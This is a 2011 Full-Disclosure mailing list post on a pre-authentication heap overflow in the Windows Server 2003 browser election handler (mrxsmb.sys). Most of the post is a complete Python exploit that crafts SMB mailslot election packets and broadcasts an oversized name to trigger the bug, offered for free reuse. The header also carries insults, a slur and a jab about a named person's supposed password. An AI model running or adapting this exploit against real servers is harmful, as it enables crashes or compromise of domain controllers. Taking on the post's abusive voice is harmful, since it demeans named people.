[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow



####################################################################################
#MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow
#Release date: 2011-02-14
#Anonymous Comment: Apologies if this puts a downer on the MSRC valentines
day sausage fest
#Author: Cupidon-3005
#Greet: Winny Thomas, Laurent Gaffie, h07
#Bug: Heap Overflow
#Remote Exploitability: Unlikely
#Local Exploitability: Likely
#Context: Broadcast, Pre-Auth
#Special Valentines Greetings: Ruben Santamarta, is your password still
"hijodeputa"? You look even more like a dumb fuck than you used to.
#From dailydave: [
https://lists.immunityinc.com/pipermail/dailydave/20110121/000057.html], So
your 31337 con is the only place to get 0day? Here's some pre-auth /
#broadcast 0day free for all on FD with 0% conference whoring, and punks are
welcome as well.
#####################################################################################
#Mrxsmb.sys, around BowserWriteErrorLog+0x175, while trying to copy 1go from
ESI to EDI ...
#Code will look something like this:
#if ((Len + 1) * sizeof(WCHAR)) > TotalBufferSize) { Len =
TotalSize/sizeof(WCHAR) - 1; }
#-1 causes Len to go 0xFFFFFFFF
#Feel free to reuse this code without restrictions and ask Kingcope-Fag to
perform his FTP FU on SMB, he might have more luck than MS.
"
import socket,sys,struct
from socket import *

if len(sys.argv)<=4:
 sys.exit("""usage: python sploit.py UR-IP BCAST-IP NBT-NAME AD-NAME
 example: python sploit.py 192.168.1.10 192.168.1.255 OhYeah
AD-NETBIOS-NAME""")

ourip = sys.argv[1]
host = sys.argv[2]
srcname = sys.argv[3].upper()
dstname = sys.argv[4].upper()


ELEC            = "\x42\x4f\x00"
WREDIR          = "\x41\x41\x00"

def encodename(nbt,service):
    final = '\x20'+''.join([chr((ord(i)>>4) + ord('A'))+chr((ord(i)&0xF) +
ord('A')) for i in nbt])+((15 - len(nbt)) * str('\x43\x41'))+service
    return final

def lengthlittle(packet,addnum):
    length = struct.pack("<i", len(packet)+addnum)[0:2]
    return length

def lengthbig(packet,addnum):
    length = struct.pack(">i", len(packet)+addnum)[2:4]
    return length

def election(srcname):
    elec = "\x08"
    elec+= "\x09" #Be the boss or die
    elec+= "\xa8\x0f\x01\x20" #Be the boss or die
    elec+= "\x1b\xe9\xa5\x00" #Up time
    elec+= "\x00\x00\x00\x00" #Null, like SDLC
    elec+= srcname+"\x00"
    return elec

def smbheaderudp(op="\x25"):
    smbheader= "\xff\x53\x4d\x42"
    smbheader+= op
    smbheader+= "\x00"
    smbheader+= "\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00\x00\x00\x00\x00\x00\x00"
    smbheader+=  "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    return smbheader


def
trans2mailslot(tid="\x80\x0b",ip=ourip,sname="LOVE-SDL",dname="SRD-LOVE",namepipe="\MAILSLOT\BROWSE",srcservice="\x41\x41\x00",dstservice="\x41\x41\x00",pbrowser=""):
    packetbrowser  =  pbrowser
    packetmailslot = "\x01\x00"
    packetmailslot+= "\x00\x00"
    packetmailslot+= "\x02\x00"
    packetmailslot+= lengthlittle(packetbrowser+namepipe,4)
    packetmailslot+= namepipe +"\x00"
    packetdatagram = "\x11"
    packetdatagram+= "\x02"
    packetdatagram+= tid
    packetdatagram+= inet_aton(ip)
    packetdatagram+= "\x00\x8a"
    packetdatagram+= "\x00\xa7"
    packetdatagram+= "\x00\x00"
    packetdatagramname = encodename(sname,srcservice)
    packetdatagramname+= encodename(dname,dstservice)
    smbheader= smbheaderudp("\x25")
    packetrans2 = "\x11"
    packetrans2+= "\x00\x00"
    packetrans2+= lengthlittle(packetbrowser,0)
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00"
    packetrans2+= "\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\xe8\x03\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= lengthlittle(packetbrowser,0)
    packetrans2+= lengthlittle(smbheader+packetrans2+packetmailslot,4)
    packetrans2+= "\x03"
    packetrans2+= "\x00"
    andoffset = lengthlittle(smbheader+packetrans2+packetmailslot,2)
    lengthcalc =
packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser
    packetfinal =
packetdatagram+packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser
    packetotalength = list(packetfinal)
    packetotalength[10:12] = lengthbig(lengthcalc,0)
    packetrans2final = ''.join(packetotalength)
    return packetrans2final

def sockbroad(host,sourceservice,destservice,packet):
   s = socket(AF_INET,SOCK_DGRAM)
   s.setsockopt(SOL_SOCKET, SO_BROADCAST,1)
   s.bind(('0.0.0.0', 138))
   try:
      packsmbheader = smbheaderudp("\x25")
      buffer0 =
trans2mailslot(tid="\x80\x22",ip=ourip,sname=srcname,dname=dstname,namepipe="\MAILSLOT\BROWSER",srcservice=sourceservice,
dstservice=destservice, pbrowser=packet)
      s.sendto(buffer0,(host,138))
   except:
      print "expected SDL error:", sys.exc_info()[0]
      raise

sockbroad(host,WREDIR,ELEC,election("A" * 410)) # -> Zing it! (between
~60->410)
print "Happy St-Valentine Bitches\nMSFT found that one loooooooong time
ago...."
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/